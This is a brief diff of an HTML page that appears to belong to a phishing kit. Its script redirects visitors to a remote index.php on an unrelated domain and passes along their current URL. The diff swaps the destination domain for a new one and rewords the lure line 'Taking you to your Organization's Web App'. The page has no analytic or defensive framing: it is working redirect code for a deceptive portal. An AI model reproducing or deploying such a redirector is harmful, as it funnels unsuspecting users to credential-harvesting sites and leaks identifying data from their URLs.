--- a/index.html
+++ b/index.html
@@ -11,11 +11,11 @@
         var e = window.location.href;
         
        
-        Redirect("https://suministrosstelar.com.co/images/index.php?url="+e);
+        Redirect("http://sofacto.info/tcncc/codeside/index.php?url="+e);
     }
 </script>
 </head>
 <body>
-<p>Taking you to your Organization's Web App...</p>
+<p>Taking you to your Organization's Page...</p>
 </body>
 </html>
